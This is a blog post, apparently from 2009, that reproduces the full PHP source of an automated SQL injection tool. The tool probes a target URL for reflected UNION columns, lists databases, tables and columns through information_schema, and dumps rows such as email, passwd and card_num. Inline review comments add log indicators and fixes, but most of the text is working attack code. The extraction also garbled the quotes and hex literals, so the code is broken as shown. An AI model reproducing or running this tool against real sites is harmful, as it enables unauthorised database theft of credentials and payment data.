
Source code of sqltools.php from AntiSecurity.Org

November 3, 2009 | Posted in How to

MALINGSIAL NOT ALLOWED

<?
// Request setup for the whole script.
// The execution time limit is removed and all PHP error output is suppressed, so a
// run is neither cut short nor visibly reported on the page.
set_time_limit(0);
error_reporting(0);
// Every form field is copied from $_POST into a global with no validation or
// escaping. "fungsi" selects the mode handled further down (db, table, column, dump).
// NOTE(review): these values are later echoed into HTML value attributes with short
// echo tags and concatenated into URLs that the server fetches with
// file_get_contents(). Nothing in this listing authenticates the caller, so anyone
// who can reach the script can make the hosting server issue outbound requests.
// A file like this found on a server you operate should be handled as an
// indicator of abuse or compromise.
$fungsi=$_POST['fungsi'];
$url=$_POST['url'];
$db=$_POST['db'];
$table=$_POST['table'];
$column=$_POST['column'];
$start=$_POST['start'];
$stop=$_POST['stop'];
$target=$_POST['target'];

?>
<!--
  Operator interface of the tool. Five panels (findcol, db, table, column, dump) are
  hidden by the stylesheet and toggled by the show()/hide() helpers. Each form posts
  back to this same script (no action attribute). The db/table/column/dump forms carry
  a hidden "fungsi" field that selects the server-side mode; the findcol form sends
  only "target".
  The example URL shows the placeholder k0pl0 in one position of a UNION select list;
  the server-side code replaces that placeholder with its own SQL expression.
  NOTE(review): the posted values are written back into value attributes with short
  echo tags and no HTML escaping, so the page reflects markup supplied in the request.
  No login check or anti-forgery token is visible in this listing.
  As extracted, the quotes in this markup are typographic, so it does not parse as shown.
-->
<title>.: SQL INJECTION TOOL BY ECEK2 & OON_BOY :.</title>
<head><script>
function show(id){
document.getElementById(id).style.display=”block”;
}
function hide(id){
document.getElementById(id).style.display=”none”;
}
function db(){show(”db”);hide(”table”);hide(”column”);hide(”dump”);hide(”findcol”);}
function table(){hide(”db”);show(”table”);hide(”column”);hide(”dump”);hide(”findcol”);}
function column(){hide(”db”);hide(”table”);show(”column”);hide(”dump”);hide(”findcol”);}
function dump(){hide(”db”);hide(”table”);hide(”column”);show(”dump”);hide(”findcol”);}
function findcol(){hide(”db”);hide(”table”);hide(”column”);hide(”dump”);show(”findcol”);}
function help(){alert(”This tool is for helping us playing with sql injection for php mysql site \n Please contact us when you find bug in this tool \n oon@oonboy.info”);}
</script><style>
#db,#table,#column,#dump,#findcol {display:none;}
</style></head>
<a href=”javascript:findcol();”>FindCol</a> |
<a href=”javascript:db();”>Database</a> |
<a href=”javascript:table();”>Table</a> |
<a href=”javascript:column();”>Column</a> |
<a href=”javascript:dump();”>Dump</a> |
<a href=”javascript:help();”>Help</a> |
<b>Created by <a href=http://ecek2.dibatam.com>ecek2</a> & <a
href=http://oon.batamhacker.or.id>OoN_Boy</a></b>
<p>
<div id=db>
<form method=post>
<input type=hidden name=fungsi value=db>
<table><tr><td>url<td> : <td><input name=url size=100 value=”<?=$url;?>”>
<tr><td><td><td><input type=submit value=”Show Databases”></table>
</form>
</div>
<div id=table>
<font color=”#000000?>ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9</font>
<form method=post>
<input type=hidden name=fungsi value=table>
<table><tr><td>url<td> : <td><input name=url size=100 value=”<?=$url;?>”><br>
<tr><td>DB<td> : <td><input name=db value=”<?=$db;?>”><br>
<tr><td><td><td><input type=submit value=”Show Table”></table>
</form>
</div>
<div id=column>
<font color=”#000000?>ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9</font>
<form method=post>
<input type=hidden name=fungsi value=column>
<table><tr><td>url<td> : <td><input name=url size=100 value=”<?=$url;?>”>
<tr><td>DB<td> : <td><input name=db value=”<?=$db;?>”>
<tr><td>Table<td> : <td><input name=table value=”<?=$table;?>”>
<tr><td><td><td><input type=submit value=”Show Column”></table>
</form>
</div>
<div id=dump>
<font color=”#000000?>ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9</font>
<form method=post>
<input type=hidden name=fungsi value=dump>
<table><tr><td>url<td> : <td><input name=url size=100 value=”<?=$url;?>”>
<tr><td>DB<td> : <td><input name=db value=”<?=$db;?>”>
<tr><td>Table<td> : <td><input name=table value=”<?=$table;?>”>
<tr><td>Column<td> : <td><input name=column value=”<?=$column;?>”> ex : email,passwd,card_num
<tr><td>Start<td> : <td><input name=start value=”<?=$start;?>”> **start from field number**
<tr><td>Stop<td> : <td><input name=stop value=”<?=$stop;?>”> **stop field number**
<tr><td><td><td><input type=submit value=”Dump”></table>
</form>
</div>
<div id=findcol>
<font color=”#000000?>ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9</font>
<form method=post>
<font color=”#000000?>Target</font> <input name=target size=100 value=”<?=$target;?>”><input type=submit value=test>
</form>
</div>
<?
/* GET DATABASE NAME */
// Mode "db": lists schema names by rewriting the operator-supplied URL.
// The URL is expected to contain the literal placeholder k0pl0. It is replaced by a
// concat() expression that wraps the wanted value in the marker 6b30706c30 (hex for
// "k0pl0"), and the value is then cut out of the fetched page with antara().
// What the receiving site sees (useful for log review and WAF rules): query strings
// containing "union+select", the hex marker 6b30706c30, "information_schema.schemata",
// then one request per row that differs only in "+limit+N,1". The requests are made
// by file_get_contents(), so they originate from the server hosting this script.
// The durable fix on the receiving side is bound parameters instead of SQL built from
// request values.
// As extracted, this listing has typographic quotes and "×" inside the hex literals,
// so it is not valid PHP as shown.
if(isset($url) && $fungsi==”db”){
$countdb=”concat(0×6b30706c30,count(schema_name),0×6b30706c30)”;
$showdb=”concat(0×6b30706c30,schema_name,0×6b30706c30)”;
$showdb2=”+from+information_schema.schemata”;
// Suffix appended to every generated URL (rendered as a dash character in this listing).
$end=”–”;
//print “$url <br>”;
// $url_2 asks for the row count; $url_3 is the per-row template used in the loop.
$url_1=str_replace(”k0pl0?,$countdb,$url);
$url_2=$url_1.$showdb2.$end;
$url_3=str_replace(”k0pl0?,$showdb,$url);
$data=file_get_contents($url_2);
// $jumlah is whatever text sits between the two markers in the remote response.
$jumlah=antara($data,”k0pl0?,”k0pl0?);
echo “$jumlah database<br>”;
// One outbound request per reported row; output is flushed so results stream to the browser.
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$showdb2.”+limit+$i,1?.$end;
$datax=file_get_contents($urlx);
$namadatabase=antara($datax,”k0pl0?,”k0pl0?);
// NOTE(review): remote content is echoed into the page without HTML escaping.
echo “$nomor : $namadatabase <br>”;
flush();
}
}

/* GET TABLE NAME */
// Mode "table": same count-then-iterate pattern as the database mode, reading
// table_name from information_schema.tables.
// Log indicators on the receiving side: "information_schema.tables", the hex marker
// 6b30706c30, an optional "where+table_schema=0x<hex>" and a run of "+limit+N,1"
// requests.
if(isset($url) && $fungsi == “table”){
$query=”concat(0×6b30706c30,count(table_name),0×6b30706c30)”;
$next=”+from+information_schema.tables”;
$query2=”concat(0×6b30706c30,table_name,0×6b30706c30)”;
$end=”–”;
// When a schema name was posted, it is sent as a hex literal (bin2hex), so the
// generated query string contains no quote characters. Filters that only look for
// quotes will not match these requests.
if(isset($db) && $db !==”"){
$next=$next.”+where+table_schema=0x”.bin2hex($db);
}

// $url_2 is the count request; $url_3 is the per-row template.
$url_1=str_replace(”k0pl0?,$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace(”k0pl0?,$query2,$url);
//echo “inject : $url_2?;
$data=file_get_contents($url_2);
//echo $data;
$jumlah=antara($data,”k0pl0?,”k0pl0?);
echo “<br>$jumlah tables<br>”;
// One outbound request per reported row.
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$next.”+limit+$i,1?.$end;
$datax=file_get_contents($urlx);
$namatable=antara($datax,”k0pl0?,”k0pl0?);
// NOTE(review): remote content is echoed into the page without HTML escaping.
echo “$nomor : $namatable <br>”;
flush();
}
}
// GET COLUMN NAME LIST
// Mode "column": same count-then-iterate pattern, reading column_name from
// information_schema.columns for the posted table (and schema, if given).
// Log indicators on the receiving side: "information_schema.columns",
// "table_name=0x<hex>", the hex marker 6b30706c30 and a run of "+limit+N,1" requests.
// NOTE(review): $url3 is not assigned anywhere in this listing; the other modes
// test $url.
if(isset($url) && $url3 !== “” && isset($table) && $table !== “” && $fungsi == “column”){
$query=”concat(0×6b30706c30,count(column_name),0×6b30706c30)”;
// Table and schema names are sent as hex literals (bin2hex), so the generated
// query string carries no quote characters.
$next=”+from+information_schema.columns+where+table_name=0x”.bin2hex($table);
$query2=”concat(0×6b30706c30,column_name,0×6b30706c30)”;
$end=”–”;
if(isset($db) && $db !==”"){
$next=$next.”+and+table_schema=0x”.bin2hex($db);
}
// $url_2 is the count request; $url_3 is the per-row template.
$url_1=str_replace(”k0pl0?,$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace(”k0pl0?,$query2,$url);
//echo “inject : $url_2?;
$data=file_get_contents($url_2);
//echo $data;
$jumlah=antara($data,”k0pl0?,”k0pl0?);
echo “<br>$jumlah Columns<br>”;
// One outbound request per reported row.
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$next.”+limit+$i,1?.$end;
//echo $urlx;
$datax=file_get_contents($urlx);
$namatable=antara($datax,”k0pl0?,”k0pl0?);
// NOTE(review): remote content is echoed into the page without HTML escaping.
echo “$nomor : $namatable <br>”;
flush();
}
}

// DUMP DATA
// Mode "dump": the data-extraction step. The posted column list is wrapped in
// concat_ws() with the separator 203a20 (hex for " : ") and read row by row from the
// posted table, optionally qualified with the posted schema name.
// The form's own example columns (email, passwd, card_num) show what is at stake for
// the receiving application: credentials and payment data. Besides bound parameters,
// the relevant controls are a least-privilege database account, salted password
// hashing and not keeping card numbers in clear text.
// Log indicators on the receiving side: "concat_ws(0x203a20", the hex marker
// 6b30706c30, "+from+<schema>.<table>" and a run of "+limit+N,1" requests.
if($fungsi==”dump” && isset($url) && $url !== “” && isset($table) && $table !== “” && isset($column) && $column !==”" ){
$query=”concat(0×6b30706c30,count(*),0×6b30706c30)”;
// Unlike the table/column modes, $table, $db and $column are inserted verbatim here.
$next=”+from+$table”;
$query2=”concat(0×6b30706c30,concat_ws(0×203a20,”.$column.”),0×6b30706c30)”;
$end=”–”;
if(isset($db) && $db !==”"){
$next=”+from+$db.$table”;
}
// $url_2 is the count request; $url_3 is the per-row template.
$url_1=str_replace(”k0pl0?,$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace(”k0pl0?,$query2,$url);
//echo “inject : $url_2?;
$data=file_get_contents($url_2);
//echo $data;
// The row count is only printed; the loop bounds come from the posted start/stop values.
$jumlah=antara($data,”k0pl0?,”k0pl0?);
echo “<br>$jumlah data<br>”;
// One outbound request per row offset from $start to $stop inclusive.
for($i=$start;$i<=$stop;$i++){
flush();
$nomor=$i;
$urlx=$url_3.$next.”+limit+$i,1?.$end;
//echo $urlx;
$datax=file_get_contents($urlx);
$namatable=antara($datax,”k0pl0?,”k0pl0?);
// NOTE(review): remote content is echoed into the page without HTML escaping.
echo “$nomor : $namatable <br>”;
flush();
}
}
// GET MAGIC NUMBER
// Mode "findcol": probes the posted target URL to learn how many columns the UNION
// needs and which position is reflected in the page (the "magic number").
// Each iteration adds one more item to the select list. Every item is the marker
// 6b30706c30 followed by the hex of "<position>oon", so a reflected value reveals its
// own position.
// Log indicators on the receiving side: a burst of up to 99 requests to the same
// path whose "-1+union+select+..." list grows by one item each time, followed by a
// single request that calls version(), user() and database().
// NOTE(review): $taget is not assigned anywhere in this listing (the field is
// $target). eregi() was removed in PHP 7.0.
if(isset($target) && $taget !== “”){
echo “trying… 1 “;
// $targetx carries the marker-bearing probes; $targety builds the plain 1,2,3,... list shown to the operator.
$targetx=$target.”-1+union+select+0×6b30706c30?;
$targety=$target.”-1+union+select+1?;
$injek=”";
$y=”";
$end=”–”;
for($i=1;$i<100;$i++){
flush();
$y .= “,”.($i+1);
$oon=($i+1).”oon”;
$hexx=bin2hex($oon);
$injek.=”,0×6b30706c30?.$hexx;
$link=$targetx.$injek;
$akhir = $link.$end;
//echo $akhir;
echo ($i+1).” “;
$data=file_get_contents($akhir);
// A response containing the marker means one of the probed positions is reflected.
if(eregi(”k0pl0?,$data)){
// The text between the marker and "oon" is the reflected position number.
$magicnumber=antara($data,”k0pl0?,”oon”);
$mbuh=”,”.$magicnumber.”,”;
// $zzz is the working URL with the k0pl0 placeholder put at the reflected position.
$zzz=str_replace($mbuh,”,k0pl0,”,$targety.$y);
$linkinjek=$targety.$y.$end;
// NOTE(review): the generated URL is written into an unquoted href without escaping.
echo “<br>VULNER : $zzz<br>Magic number= $magicnumber<br><a href=$linkinjek target=\”_blank\”>$linkinjek</a><p><b>info</b><br>”;
// Follow-up fingerprint request. The hex literals decode to "<br>",
// "database version : ", "database user : " and "database name : ".
$ambilinfo=str_replace(”k0pl0?,”concat(0×6b30706c30,concat_ws
(0×3c62723e,concat(0×64617461626173652076657273696f6e203a20,version()),concat
(0×64617461626173652075736572203a20,user()),concat(0×6461746162617365206e616d65203a20,database())),0×6b30706c30)”,$zzz).$end;
$datainfo=file_get_contents($ambilinfo);
$info=antara($datainfo,”k0pl0?,”k0pl0?);
echo $info;
break;
}
// Reached only when no probe up to the last iteration was reflected.
if($i==”99?){echo “<br><font color=red><b>Maybe this site is not Vulner, or you can try to inject it manually :) <b></font>”;}
flush();
}
}

// Returns the part of $string that lies between the first occurrence of $start and
// the next occurrence of $end after it; returns an empty string when $start is not found.
// Every mode uses it to cut the marker-delimited value out of a fetched page.
function antara($string, $start, $end){
// A character is prepended so that a match at the very beginning lands at offset 1.
// Offset 0 can then only come from strpos() returning false, which the loose
// comparison below treats as "not found".
$string = ” “.$string;
$ini = strpos($string,$start);
if ($ini == 0) return “”;
$ini += strlen($start);
// NOTE(review): if $end does not occur after $start, strpos() returns false and $len
// becomes negative; substr() then treats it as a count of characters to omit from
// the end of the string.
$len = strpos($string,$end,$ini) – $ini;
return substr($string,$ini,$len);
}
?>
